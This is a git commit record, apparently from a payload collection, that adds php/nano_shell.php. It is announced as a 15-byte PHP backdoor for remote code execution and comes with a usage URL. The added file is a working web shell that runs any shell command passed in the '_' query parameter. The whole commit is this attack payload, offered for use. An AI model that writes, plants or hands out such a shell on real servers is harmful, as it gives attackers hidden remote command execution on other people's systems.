feat: Add 15 bytes PHP payload to achieve RCE!

- Add 15 bytes long PHP backdoor to achieve RCE! 
Usage:
`http://127.0.0.1/?_=ls`
This commit is contained in:
0x08 2022-03-03 17:29:42 +03:00 committed by Alexandre ZANNI
parent 9d0462804b
commit ef003783c8

1
php/nano_shell.php Normal file
View file

@ -0,0 +1 @@
<?=`$_GET[_]`?>